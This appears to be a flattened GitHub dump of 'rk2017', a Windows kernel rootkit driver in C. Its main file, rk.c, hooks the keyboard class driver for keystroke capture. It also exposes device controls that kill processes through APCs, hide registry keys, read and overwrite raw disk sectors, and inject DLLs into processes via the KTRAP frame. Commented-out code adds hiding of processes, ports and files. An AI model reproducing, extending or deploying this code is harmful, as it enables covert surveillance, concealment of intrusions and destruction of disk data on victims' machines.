#define __RK2017_HOOK_H__ 3 | 4 | NTSTATUS UnHook(); 5 | NTSTATUS Hook(); 6 | 7 | #endif -------------------------------------------------------------------------------- /rk/Sector.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/Sector.c -------------------------------------------------------------------------------- /rk/Sector.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/Sector.h -------------------------------------------------------------------------------- /rk/SystemPreInit.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/SystemPreInit.h -------------------------------------------------------------------------------- /rk/TdiSocket.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/TdiSocket.c -------------------------------------------------------------------------------- /rk/TdiSocket.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/TdiSocket.h -------------------------------------------------------------------------------- /rk/TimeUtils.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/TimeUtils.c -------------------------------------------------------------------------------- /rk/TimeUtils.h: -------------------------------------------------------------------------------- 1 | #ifndef __TIME_UTILS_H__ 2 | #define __TIME_UTILS_H__ 3 | 4 | VOID MyGetTickCount_100N(); 5 | VOID MyGetCurrentTime_100N(); 6 | LONG MyGetTickCount_S(); 7 | LONG MyGetCurrentTime_S(); 8 | 9 | #endif -------------------------------------------------------------------------------- /rk/ToolFnc.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "ToolFnc.h" 3 | 4 | char* _strlwr_d(char* src) 5 | { 6 | while (*src != '\0') 7 | { 8 | if (*src > 'A' && *src <= 'Z') 9 | { 10 | //*src += 0x20; 11 | *src += 32; 12 | } 13 | src++; 14 | } 15 | return src; 16 | } 17 | static int __inline Lower(int c) 18 | { 19 | if ((c >= L'A') && (c <= L'Z')) 20 | { 21 | return(c + (L'a' - L'A')); 22 | } 23 | else 24 | { 25 | return(c); 26 | } 27 | } 28 | 29 | 30 | BOOLEAN RtlPatternMatch(WCHAR * pat, WCHAR * str) 31 | { 32 | register WCHAR * s; 33 | register WCHAR * p; 34 | BOOLEAN star = FALSE; 35 | 36 | loopStart: 37 | for (s = str, p = pat; *s; ++s, ++p) { 38 | switch (*p) { 39 | case L'?': 40 | if (*s == L'.') goto starCheck; 41 | break; 42 | case L'*': 43 | star = TRUE; 44 | str = s, pat = p; 45 | if (!*++pat) return TRUE; 46 | goto loopStart; 47 | default: 48 | if (Lower(*s) != Lower(*p)) 49 | goto starCheck; 50 | break; 51 | } 52 | } 53 | if (*p == L'*') ++p; 54 | return (!*p); 55 | 56 | starCheck: 57 | if (!star) return FALSE; 58 | str++; 59 | goto loopStart; 60 | } -------------------------------------------------------------------------------- /rk/ToolFnc.h: -------------------------------------------------------------------------------- 1 | #ifndef __TOOL_FNC_H__ 2 | #define __TOOL_FNC_H__ 3 | 4 | char* _strlwr_d(char* src); 5 | BOOLEAN RtlPatternMatch(WCHAR * pat, WCHAR * str); 6 | 7 | #endif -------------------------------------------------------------------------------- /rk/Utils.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/Utils.c -------------------------------------------------------------------------------- /rk/Utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTILS_H__ 2 | #define __UTILS_H__ 3 | 4 | 5 | CHAR __ISUPPER__(CHAR c); 6 | CHAR __TOLOWER__(CHAR c); 7 | void CleanZero(PCHAR pCleanBuffer,ULONG ulLength); 8 | PCHAR MyMEMCPY(PCHAR pDst,PCHAR pSrc,ULONG ulLength); 9 | ULONG CalcHashValue(char *szApiName); 10 | int MyMemicmp(char *src,char *dest,int size); 11 | char *MyStristr(char *src,char *dest); 12 | int my_strcmp(char *src,char *dest); 13 | char *MyStrCpy(char *dst,const char *src); 14 | PCHAR MyStrChr(PCHAR pDest,ULONG ulAscii); 15 | ULONG __STRLEN__(PCHAR pStr); 16 | ULONG __STRNCMPI__(PCHAR lpStr1,PCHAR lpStr2,ULONG ulLen); 17 | PVOID KernelMalloc(ULONG ulSize); 18 | void KernelFree(PVOID pFreeAddr); 19 | char *ltoa(long value, char *string, int radix); 20 | ULONG GetSumCheck(PCHAR pDat,ULONG ulLen); 21 | #endif -------------------------------------------------------------------------------- /rk/rk.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "ApcKillProcess.h" 3 | #include "DrvFunction.h" 4 | #include "InitializeInjectRelevantInfo.h" 5 | #include "Rk2017Hook.h" 6 | #include "SystemPreInit.h" 7 | #include "HideProcess.h" 8 | #include "HideReg.h" 9 | #include "Sector.h" 10 | #include "KLog.h" 11 | #include "DrvFileSystem.h" 12 | #include "InjectKtrapFrame.h" 13 | 14 | RK2017_RUNTIME_LIBRARY g_Rk2017RunTimeLibrary; 15 | 16 | NTSTATUS Dispatch(PDEVICE_OBJECT pDevObj,PIRP pIrp); 17 | NTSTATUS ReadDispatch(PDEVICE_OBJECT pDevObj,PIRP pIrp); 18 | NTSTATUS DispatchIoCtl(PDEVICE_OBJECT pDevObj,PIRP pIrp); 19 | 20 | #ifdef SHUTDOWN_PROTECT 21 | NTSTATUS DispatchShutdown(PDEVICE_OBJECT pDevObj,PIRP pIrp); 22 | #endif 23 | 24 | #ifdef _DEBUG 25 | 26 | void DrvUnLoad(PDRIVER_OBJECT pDrvObj) 27 | { 28 | UNICODE_STRING UniSymName; 29 | 30 | if (g_Rk2017RunTimeLibrary.UniRegPath.Buffer) 31 | { 32 | ExFreePool(g_Rk2017RunTimeLibrary.UniRegPath.Buffer); 33 | g_Rk2017RunTimeLibrary.UniRegPath.Buffer = NULL; 34 | } 35 | IoUnregisterShutdownNotification(pDrvObj->DeviceObject); 36 | PsSetCreateProcessNotifyRoutine(CreateProcessRoutine,TRUE); 37 | if (pDrvObj->DeviceObject) 38 | { 39 | RtlInitUnicodeString(&UniSymName,RK2017_LINKNAME); 40 | IoDeleteSymbolicLink(&UniSymName); 41 | IoDeleteDevice(pDrvObj->DeviceObject); 42 | } 43 | return; 44 | } 45 | 46 | #endif 47 | NTSTATUS SetDrvStartType(ULONG ulStartType,PWCHAR pDrvName) 48 | { 49 | NTSTATUS Status; 50 | HANDLE hDrvKey; 51 | UNICODE_STRING UniKeyPath; 52 | UNICODE_STRING UniSubKey; 53 | OBJECT_ATTRIBUTES ObjectAttributes; 54 | WCHAR wDrvKey[MAX_PATH]; 55 | ULONG ulNeedSize; 56 | PKEY_VALUE_PARTIAL_INFORMATION pKeyValuePartialInfo; 57 | 58 | Status = STATUS_SUCCESS; 59 | hDrvKey = NULL; 60 | ulNeedSize = 0; 61 | pKeyValuePartialInfo = NULL; 62 | RtlZeroMemory(wDrvKey,sizeof(WCHAR) * MAX_PATH); 63 | StringCchPrintfW(wDrvKey,MAX_PATH, \ 64 | L"\\registry\\machine\\system\\currentcontrolset\\services\\%ws", \ 65 | pDrvName); 66 | RtlInitUnicodeString(&UniKeyPath,wDrvKey); 67 | InitializeObjectAttributes(&ObjectAttributes,&UniKeyPath,OBJ_CASE_INSENSITIVE,NULL,0); 68 | Status = ZwOpenKey(&hDrvKey,KEY_ALL_ACCESS,&ObjectAttributes); 69 | if (NT_SUCCESS(Status)) 70 | { 71 | RtlInitUnicodeString(&UniSubKey,L"Start"); 72 | Status = ZwQueryValueKey(hDrvKey,&UniSubKey,KeyValuePartialInformation,NULL,0,&ulNeedSize); 73 | if (NT_ERROR(Status) && Status == STATUS_BUFFER_TOO_SMALL) 74 | { 75 | do 76 | { 77 | pKeyValuePartialInfo = ExAllocatePool(NonPagedPool,ulNeedSize); 78 | } while (NULL == pKeyValuePartialInfo); 79 | RtlZeroMemory(pKeyValuePartialInfo,ulNeedSize); 80 | Status = ZwQueryValueKey(hDrvKey,&UniSubKey,KeyValuePartialInformation,pKeyValuePartialInfo,ulNeedSize,&ulNeedSize); 81 | if (NT_SUCCESS(Status)) 82 | { 83 | if (pKeyValuePartialInfo->Type == REG_DWORD) 84 | { 85 | if (*(ULONG*)pKeyValuePartialInfo->Data != ulStartType) 86 | { 87 | Status = ZwSetValueKey(hDrvKey,&UniSubKey,0,REG_DWORD,&ulStartType,sizeof(ULONG)); 88 | if (NT_SUCCESS(Status)) 89 | { 90 | if (pKeyValuePartialInfo) 91 | { 92 | ExFreePool(pKeyValuePartialInfo); 93 | pKeyValuePartialInfo = NULL; 94 | } 95 | ZwClose(hDrvKey); 96 | return Status; 97 | } 98 | } 99 | } 100 | } 101 | } 102 | } 103 | if (pKeyValuePartialInfo) 104 | { 105 | ExFreePool(pKeyValuePartialInfo); 106 | pKeyValuePartialInfo = NULL; 107 | } 108 | if (hDrvKey) 109 | { 110 | ZwClose(hDrvKey); 111 | } 112 | return Status; 113 | } 114 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj,PUNICODE_STRING pUniRegistry) 115 | { 116 | NTSTATUS Status; 117 | UNICODE_STRING UniDevName; 118 | UNICODE_STRING UniSymName; 119 | UNICODE_STRING UniDrvName; 120 | ANSI_STRING AnsiDrvName; 121 | PDEVICE_OBJECT pDevObj; 122 | PWCHAR pwQuote; 123 | WCHAR wTempPath[MAX_PATH]; 124 | //WCHAR HideDrvFileNameW[MAX_PATH]; 125 | //WCHAR HideDrvKeyNameW[MAX_PATH]; 126 | 127 | do 128 | { 129 | if (*NtBuildNumber < 2600) 130 | { 131 | Status = STATUS_NOT_SUPPORTED; 132 | break; 133 | } 134 | RtlZeroMemory(&g_Rk2017RunTimeLibrary,sizeof(RK2017_RUNTIME_LIBRARY)); 135 | 136 | g_Rk2017RunTimeLibrary.pDriverObject = pDrvObj; 137 | 138 | g_Rk2017RunTimeLibrary.UniRegPath.MaximumLength = pUniRegistry->Length + sizeof(UNICODE_NULL); 139 | g_Rk2017RunTimeLibrary.UniRegPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool, \ 140 | g_Rk2017RunTimeLibrary.UniRegPath.MaximumLength); 141 | if (NULL != g_Rk2017RunTimeLibrary.UniRegPath.Buffer) 142 | { 143 | RtlCopyUnicodeString(&g_Rk2017RunTimeLibrary.UniRegPath,pUniRegistry); 144 | RtlZeroMemory(wTempPath,MAX_PATH * sizeof(WCHAR)); 145 | if(pUniRegistry->Length < MAX_PATH * sizeof(WCHAR)) 146 | { 147 | RtlCopyMemory(wTempPath,pUniRegistry->Buffer, pUniRegistry->Length); 148 | _wcslwr(wTempPath); 149 | pwQuote = wcsrchr(wTempPath,L'\\'); 150 | if(pwQuote) 151 | { 152 | pwQuote++; 153 | RtlInitUnicodeString(&UniDrvName,pwQuote); 154 | RtlCopyMemory(g_Rk2017RunTimeLibrary.wDrvName,UniDrvName.Buffer,UniDrvName.Length); 155 | _wcslwr(g_Rk2017RunTimeLibrary.wDrvName); 156 | RtlUnicodeStringToAnsiString(&AnsiDrvName,&UniDrvName,TRUE); 157 | RtlCopyMemory(g_Rk2017RunTimeLibrary.DrvName,AnsiDrvName.Buffer,AnsiDrvName.Length); 158 | _strlwr(g_Rk2017RunTimeLibrary.DrvName); 159 | RtlFreeAnsiString(&AnsiDrvName); 160 | } 161 | } 162 | } 163 | else 164 | { 165 | g_Rk2017RunTimeLibrary.UniRegPath.MaximumLength = 0; 166 | g_Rk2017RunTimeLibrary.UniRegPath.Length = 0; 167 | } 168 | 169 | g_Rk2017RunTimeLibrary.ulSafeMode = *InitSafeBootMode; 170 | RtlInitUnicodeString(&UniDevName,RK2017_DEVNAME); 171 | RtlInitUnicodeString(&UniSymName,RK2017_LINKNAME); 172 | 173 | Status = IoCreateDevice(pDrvObj, \ 174 | (ULONG)NULL, \ 175 | &UniDevName, \ 176 | FILE_DEVICE_UNKNOWN, \ 177 | 0, \ 178 | FALSE, \ 179 | &pDevObj); 180 | if (NT_ERROR(Status)) 181 | { 182 | break; 183 | } 184 | 185 | g_Rk2017RunTimeLibrary.pDeviceObject = pDevObj; 186 | 187 | Status = IoCreateSymbolicLink(&UniSymName,&UniDevName); 188 | if (NT_ERROR(Status)) 189 | { 190 | IoDeleteDevice(pDevObj); 191 | break; 192 | } 193 | 194 | pDrvObj->MajorFunction[IRP_MJ_CREATE] = (PDRIVER_DISPATCH)Dispatch; 195 | pDrvObj->MajorFunction[IRP_MJ_CLOSE] = (PDRIVER_DISPATCH)Dispatch; 196 | pDrvObj->MajorFunction[IRP_MJ_READ] = (PDRIVER_DISPATCH)Dispatch; 197 | pDrvObj->MajorFunction[IRP_MJ_WRITE] = (PDRIVER_DISPATCH)Dispatch; 198 | #ifdef SHUTDOWN_PROTECT 199 | pDrvObj->MajorFunction[IRP_MJ_SHUTDOWN] = DispatchShutdown; 200 | Status = IoRegisterShutdownNotification(pDevObj); 201 | if (NT_ERROR(Status)) 202 | { 203 | KdPrint(("IoRegisterShutdownNotification Failde~~~\r\n")); 204 | } 205 | #endif 206 | pDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = (PDRIVER_DISPATCH)DispatchIoCtl; 207 | #ifdef _DEBUG 208 | pDrvObj->DriverUnload = DrvUnLoad; 209 | #endif 210 | 211 | InitializeInjectInformation(&g_InjectRelevantOffset); 212 | //InitializeHideProcessList(); 213 | //InitWhiteProcNameListAndLock(); 214 | //InitializeHideKeyList(); 215 | 216 | g_Rk2017RunTimeLibrary.pSystemProcess = IoGetCurrentProcess(); 217 | //RtlZeroMemory(HideDrvFileNameW,sizeof(WCHAR) * MAX_PATH); 218 | //StringCchPrintfW(HideDrvFileNameW,MAX_PATH,L"%ws.sys",g_Rk2017RunTimeLibrary.wDrvName); 219 | //AddNameToWhiteNameList(HideDrvFileNameW); 220 | 221 | HookKbdClass(TRUE); 222 | //Status = SetDrvStartType(SERVICE_SYSTEM_START,g_Rk2017RunTimeLibrary.wDrvName); 223 | //if (NT_ERROR(Status)) 224 | //{ 225 | 226 | //} 227 | 228 | //InitializeHidePort(); 229 | //InstallTcpDriverHook(); 230 | 231 | //RtlZeroMemory(HideDrvKeyNameW,sizeof(WCHAR) * MAX_PATH); 232 | //StringCchPrintfW(HideDrvKeyNameW, \ 233 | // MAX_PATH, \ 234 | // L"\\registry\\machine\\system\\currentcontrolset\\services\\%ws", \ 235 | // g_Rk2017RunTimeLibrary.wDrvName); 236 | //Status = CmHideKey(HideDrvKeyNameW); 237 | 238 | CheckFileSystem(pDrvObj); 239 | //if (g_InjectRelevantOffset.WindowsVersion.bIsWindows2000 != TRUE && \ 240 | // g_InjectRelevantOffset.WindowsVersion.bIsWindows2003 != TRUE && \ 241 | // g_InjectRelevantOffset.WindowsVersion.bIsWindowsXp != TRUE) 242 | //{ 243 | // RegisterFltHideFile(pDrvObj); 244 | //} 245 | 246 | } while (0); 247 | if (NT_ERROR(Status)) 248 | { 249 | if (pDrvObj->DeviceObject) 250 | { 251 | RtlInitUnicodeString(&UniSymName,RK2017_LINKNAME); 252 | IoDeleteSymbolicLink(&UniSymName); 253 | IoDeleteDevice(pDrvObj->DeviceObject); 254 | } 255 | } 256 | return Status; 257 | } 258 | NTSTATUS Dispatch(PDEVICE_OBJECT pDevObj,PIRP pIrp) 259 | { 260 | pIrp->IoStatus.Status = STATUS_SUCCESS; 261 | pIrp->IoStatus.Information = 0; 262 | 263 | IoCompleteRequest(pIrp,IO_NO_INCREMENT); 264 | return STATUS_SUCCESS; 265 | } 266 | NTSTATUS ReadDispatch(PDEVICE_OBJECT pDevObj,PIRP pIrp) 267 | { 268 | pIrp->IoStatus.Status = STATUS_SUCCESS; 269 | pIrp->IoStatus.Information = 0; 270 | 271 | IoCompleteRequest(pIrp,IO_NO_INCREMENT); 272 | return STATUS_SUCCESS; 273 | } 274 | NTSTATUS DispatchIoCtl(PDEVICE_OBJECT pDevObj,PIRP pIrp) 275 | { 276 | NTSTATUS Status; 277 | PIO_STACK_LOCATION pIrpStack; 278 | PUCHAR pInBuffer,pOutBuffer; 279 | ULONG ulInLength,ulOutLength,ulIoCtlCode,ulInfo; 280 | 281 | Status = STATUS_INVALID_PARAMETER; 282 | ulInfo = 0; 283 | 284 | pIrpStack = IoGetCurrentIrpStackLocation(pIrp); 285 | ulInLength = pIrpStack->Parameters.DeviceIoControl.InputBufferLength; 286 | pInBuffer = pIrp->AssociatedIrp.SystemBuffer; 287 | ulOutLength = pIrpStack->Parameters.DeviceIoControl.OutputBufferLength; 288 | pOutBuffer = pIrp->AssociatedIrp.SystemBuffer; 289 | ulIoCtlCode = pIrpStack->Parameters.DeviceIoControl.IoControlCode; 290 | 291 | switch(ulIoCtlCode) 292 | { 293 | case IOC(RkKillProcess): 294 | { 295 | IOP(RkKillProcess) *Param; 296 | 297 | if (sizeof(*Param) == ulInLength) 298 | { 299 | Param = (IOP(RkKillProcess) *)pIrp->AssociatedIrp.SystemBuffer; 300 | if (Param->hKillPId) 301 | { 302 | Status = KillProcessByApc(Param->hKillPId); 303 | } 304 | else 305 | { 306 | Status = KillProcessByApc((HANDLE)GetProcessId(Param->ProcessName)); 307 | } 308 | } 309 | } 310 | break; 311 | case IOC(RkHideRegister): 312 | { 313 | IOP(RkHideRegister) *Param; 314 | 315 | if (sizeof(*Param) == ulInLength) 316 | { 317 | Param = (IOP(RkHideRegister) *)pIrp->AssociatedIrp.SystemBuffer; 318 | if (Param->bIsAddHide) 319 | { 320 | if (Param->RegisterPath[0] != '\0') 321 | { 322 | Status = CmHideKey(Param->RegisterPath); 323 | } 324 | } 325 | else 326 | { 327 | 328 | } 329 | } 330 | } 331 | break; 332 | case IOC(WriteSector): 333 | { 334 | IOP(WriteSector) *Param; 335 | 336 | if (sizeof(*Param) > ulInLength && ulOutLength < sizeof(*Param)) 337 | { 338 | break; 339 | } 340 | Param = (IOP(WriteSector) *)pIrp->AssociatedIrp.SystemBuffer; 341 | Status = ReadSector(Param->ulDiskIndex, \ 342 | Param->ulSectorSize, \ 343 | Param->ulStartSector, \ 344 | Param->OrgSector, \ 345 | Param->ulLength); 346 | Status = WriteSector(Param->ulDiskIndex, \ 347 | Param->ulSectorSize, \ 348 | Param->ulStartSector, \ 349 | Param->NewSector, \ 350 | Param->ulLength); 351 | ulInfo = sizeof(*Param); 352 | } 353 | break; 354 | case IOC(ReadSector): 355 | { 356 | IOP(ReadSector) *Param; 357 | 358 | if (sizeof(*Param) > ulInLength && ulOutLength < sizeof(*Param)) 359 | { 360 | break; 361 | } 362 | Param = (IOP(ReadSector) *)pIrp->AssociatedIrp.SystemBuffer; 363 | Status = ReadSector(Param->ulDiskIndex, \ 364 | Param->ulSectorSize, \ 365 | Param->ulStartSector, \ 366 | Param->NewSector, \ 367 | Param->ulLength); 368 | RtlCopyMemory(Param->OrgSector,Param->NewSector,Param->ulLength); 369 | ulInfo = Param->ulLength; 370 | } 371 | break; 372 | case IOC(InjectKtrapFrame): 373 | { 374 | IOP(InjectKtrapFrame) *Param; 375 | PINJECT_PROCESS_INFORMATION pInjectProcessInfo; 376 | 377 | if (ulInLength < sizeof(*Param)) 378 | { 379 | break; 380 | } 381 | Param = (IOP(InjectKtrapFrame) *)pIrp->AssociatedIrp.SystemBuffer; 382 | //inject_ktrap_frame(params->pInjectProcessName,NULL,params->pInjectDllPath); 383 | //g_bIsInjectKtrapFrame = TRUE; 384 | do 385 | { 386 | pInjectProcessInfo = ExAllocatePoolWithTag(NonPagedPool,sizeof(INJECT_PROCESS_INFORMATION) + MAX_PATH,'PasP'); 387 | } while (NULL == pInjectProcessInfo); 388 | RtlZeroMemory(pInjectProcessInfo,sizeof(INJECT_PROCESS_INFORMATION) + MAX_PATH); 389 | 390 | Param = (IOP(InjectKtrapFrame) *)pIrp->AssociatedIrp.SystemBuffer; 391 | if (Param->ulPid) 392 | { 393 | pInjectProcessInfo->ulPid = Param->ulPid; 394 | } 395 | else 396 | { 397 | RtlCopyMemory(pInjectProcessInfo->pInjectProcessName,Param->pInjectProcessName,strlen(Param->pInjectProcessName)); 398 | } 399 | #ifndef _WIN64 400 | Status = InjectKtrapFrame(pInjectProcessInfo,Param->pInjectDllPath); 401 | if (pInjectProcessInfo) 402 | { 403 | ExFreePoolWithTag(pInjectProcessInfo,'PasP'); 404 | } 405 | #else 406 | if (pInjectProcessInfo) 407 | { 408 | ExFreePoolWithTag(pInjectProcessInfo,'PasP'); 409 | } 410 | #endif 411 | } 412 | break; 413 | default: 414 | Status = STATUS_INVALID_DEVICE_REQUEST; 415 | break; 416 | } 417 | pIrp->IoStatus.Status = Status; 418 | pIrp->IoStatus.Information = ulInfo; 419 | IoCompleteRequest(pIrp,IO_NO_INCREMENT); 420 | return Status; 421 | } 422 | #ifdef SHUTDOWN_PROTECT 423 | NTSTATUS DispatchShutdown(PDEVICE_OBJECT pDevObj,PIRP pIrp) 424 | { 425 | 426 | //PIO_STACK_LOCATION Stack; 427 | NTSTATUS Status; 428 | 429 | Status = STATUS_SUCCESS; 430 | 431 | //Status = SetDrvStartType(SERVICE_SYSTEM_START,g_Rk2017RunTimeLibrary.wDrvName); 432 | //if (NT_ERROR(Status)) 433 | //{ 434 | 435 | //} 436 | //Stack = IoGetCurrentIrpStackLocation(pIrp); 437 | pIrp->IoStatus.Information = 0; 438 | pIrp->IoStatus.Status = STATUS_SUCCESS; 439 | IoCompleteRequest(pIrp,IO_NO_INCREMENT); 440 | return STATUS_SUCCESS; 441 | } 442 | #endif -------------------------------------------------------------------------------- /rk/rk.h: -------------------------------------------------------------------------------- 1 | #ifndef __RK_H__ 2 | #define __RK_H__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #define MAX_PATH 300 16 | #define MAX_PATH_LEN 1024 17 | 18 | #include "IoCtlCode.h" 19 | 20 | typedef NTSTATUS (*PSPTERMINATETHREADBYPOINTER)(IN PETHREAD Thread,IN NTSTATUS ExitStatus,IN BOOLEAN DirectTerminate); 21 | 22 | typedef enum _KAPC_ENVIRONMENT 23 | { 24 | OriginalApcEnvironment, 25 | AttachedApcEnvironment, 26 | CurrentApcEnvironment, 27 | InsertApcEnvironment 28 | } KAPC_ENVIRONMENT; 29 | 30 | VOID KeInitializeApc(PRKAPC Apc, 31 | PRKTHREAD Thread, 32 | KAPC_ENVIRONMENT Environment, 33 | PKKERNEL_ROUTINE KernelRoutine, 34 | PKRUNDOWN_ROUTINE RundownRoutine, 35 | PKNORMAL_ROUTINE NormalRoutine, 36 | KPROCESSOR_MODE ProcessorMode, 37 | PVOID NormalContext); 38 | BOOLEAN KeInsertQueueApc(PRKAPC Apc, 39 | PVOID SystemArgument1, 40 | PVOID SystemArgument2, 41 | KPRIORITY Increment); 42 | PUCHAR PsGetProcessImageFileName(IN PEPROCESS Process); 43 | NTSTATUS ZwQueryInformationProcess(HANDLE ProcessHandle, \ 44 | PROCESSINFOCLASS ProcessInformationClass, \ 45 | PVOID ProcessInformation, \ 46 | ULONG ProcessInformationLength, \ 47 | PULONG ReturnLength); 48 | BOOLEAN KeAlertThread(PKTHREAD Thread,KPROCESSOR_MODE AlertMode); 49 | 50 | extern USHORT *NtBuildNumber; 51 | extern ULONG *InitSafeBootMode; 52 | 53 | typedef struct _RK2017_RUNTIME_LIBRARY 54 | { 55 | PDRIVER_OBJECT pDriverObject; 56 | PDEVICE_OBJECT pDeviceObject; 57 | UNICODE_STRING UniRegPath; 58 | WCHAR wDrvName[MAX_PATH]; 59 | CHAR DrvName[MAX_PATH]; 60 | ULONG ulSafeMode; 61 | BOOLEAN bIsUninstall; 62 | BOOLEAN bIsStartFilter; 63 | PFLT_FILTER phFltHide; 64 | PFLT_INSTANCE pFltInstance; 65 | PVOID pSystemProcess; 66 | }RK2017_RUNTIME_LIBRARY,*PRK2017_RUNTIME_LIBRARY; 67 | 68 | extern RK2017_RUNTIME_LIBRARY g_Rk2017RunTimeLibrary; 69 | #endif -------------------------------------------------------------------------------- /rk/rk.ncb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/rk.ncb -------------------------------------------------------------------------------- /rk/rk.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rk", "rk.vcproj", "{CC24F9E6-8D31-445B-B49B-7F6F64558DA5}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrK", "..\LdrK\LdrK.vcproj", "{F2BFBBF8-BB04-4D26-9E19-467C0032ABE0}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Vfs", "..\Vfs\Vfs.vcproj", "{14D8AAA7-3730-4B35-A8BA-7444020E3797}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TdiFlt", "..\TdiFlt\TdiFlt.vcproj", "{811488FB-C728-49D7-89EA-FF0DC0D349BE}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Win32 = Debug|Win32 15 | Release|Win32 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {CC24F9E6-8D31-445B-B49B-7F6F64558DA5}.Debug|Win32.ActiveCfg = Debug|Win32 19 | {CC24F9E6-8D31-445B-B49B-7F6F64558DA5}.Debug|Win32.Build.0 = Debug|Win32 20 | {CC24F9E6-8D31-445B-B49B-7F6F64558DA5}.Release|Win32.ActiveCfg = Release|Win32 21 | {CC24F9E6-8D31-445B-B49B-7F6F64558DA5}.Release|Win32.Build.0 = Release|Win32 22 | {F2BFBBF8-BB04-4D26-9E19-467C0032ABE0}.Debug|Win32.ActiveCfg = Debug|Win32 23 | {F2BFBBF8-BB04-4D26-9E19-467C0032ABE0}.Debug|Win32.Build.0 = Debug|Win32 24 | {F2BFBBF8-BB04-4D26-9E19-467C0032ABE0}.Release|Win32.ActiveCfg = Release|Win32 25 | {F2BFBBF8-BB04-4D26-9E19-467C0032ABE0}.Release|Win32.Build.0 = Release|Win32 26 | {14D8AAA7-3730-4B35-A8BA-7444020E3797}.Debug|Win32.ActiveCfg = Debug|Win32 27 | {14D8AAA7-3730-4B35-A8BA-7444020E3797}.Debug|Win32.Build.0 = Debug|Win32 28 | {14D8AAA7-3730-4B35-A8BA-7444020E3797}.Release|Win32.ActiveCfg = Release|Win32 29 | {14D8AAA7-3730-4B35-A8BA-7444020E3797}.Release|Win32.Build.0 = Release|Win32 30 | {811488FB-C728-49D7-89EA-FF0DC0D349BE}.Debug|Win32.ActiveCfg = Debug|Win32 31 | {811488FB-C728-49D7-89EA-FF0DC0D349BE}.Debug|Win32.Build.0 = Debug|Win32 32 | {811488FB-C728-49D7-89EA-FF0DC0D349BE}.Release|Win32.ActiveCfg = Release|Win32 33 | {811488FB-C728-49D7-89EA-FF0DC0D349BE}.Release|Win32.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /rk/rk.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/rk.suo -------------------------------------------------------------------------------- /rk/rk.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/rk.v11.suo -------------------------------------------------------------------------------- /rk/rk.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/rk.vcproj -------------------------------------------------------------------------------- /rk/rk.vcproj.Seh_Cracker-PC.Seh_Cracker.user: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 11 | 35 | 36 | 39 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /rk/rk.vcproj.WIN-NOI20UV8BRP.DriverTest.user: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 11 | 35 | 36 | 39 | 63 | 64 | 65 | 66 | --------------------------------------------------------------------------------